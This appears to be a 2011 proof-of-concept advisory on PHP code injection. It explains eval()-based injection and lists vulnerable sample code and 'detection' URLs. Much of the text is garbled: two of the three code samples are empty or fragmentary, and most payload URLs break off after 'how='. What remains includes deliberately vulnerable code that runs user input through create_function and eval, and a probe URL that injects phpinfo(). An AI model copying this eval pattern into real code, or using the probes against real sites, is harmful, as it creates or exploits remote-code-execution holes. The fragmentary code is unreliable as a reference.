|===============================================================================================| |-----> [ID] : [SSB00000] | |-----> [Title] : [PoC of PHP Code Injection] | |-----> [Criticality] : [High] | |-----> [Email] : [ssbostan@gmail.com] | |-----> [Date] : [18/07/2011] | |===============================================================================================| ######################################################################################### BOF ### ### Introduction + + PCI is a type of vulnerability in php language and allows attacker to inject php codes. + two types of PCI attacks are: + 1- Inject PHP code in PHP Code (if use eval() function) + 2- Inject Code in used function area (if use another functions) + + in the first method you can use each of php functions for attacking. + + for example: + you can use include(), system() functions or another in eval() function. + + but + + in the second method you can just use orders that in used function area. + + for example: + if source used system() function you can just execute command such as RCE method. + or + if source used include() function you can just include pages such as RFI method. + + Attention: + because all methods of second method have specified name, the first method is PCI..!!! + + + + ### Vulnerable source codes + + We have three sample codes for proof of concept. + + PoC1 (5 line): + + + + PoC2 (6 line): + + /si",create_function('$how','ob_start();eval("$how[2];");$return=ob_get_contents();ob_end_clean();return $return;'),$how); + $how=preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$how','ob_start();eval("print $how[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$how); + echo $how; + ?> + + PoC3 (5 line): + + '.$how); + ?> + + + + ### Detection + + PoC1: + http://website.com/page.php?how=phpinfo(); + + PoC2: + http://website.com/page.php?how= + + PoC3: + http://website.com/page.php?how= + or + http://website.com/page.php?how= + or + http://website.com/page.php?how=